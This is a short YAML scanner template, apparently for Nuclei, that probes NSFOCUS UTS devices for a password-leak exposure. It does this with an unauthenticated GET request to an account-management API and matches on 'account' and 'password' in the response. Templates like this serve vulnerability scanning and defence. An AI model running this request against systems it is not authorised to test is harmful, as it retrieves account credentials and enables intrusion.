id: poc-yaml-nsfocus-uts-password-leak

info:
  name: poc-yaml-nsfocus-uts-password-leak
  author: MrP01ntSun(https://github.com/MrPointSun)
  severity: high
  tags: xray-converted,exposure,ct-158435
  reference:
    - https://blog.csdn.net/m0_48520508/article/details/108719150

http:
  - raw:
      - |
        GET /webapi/v1/system/accountmanage/account HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "account"
          - "password"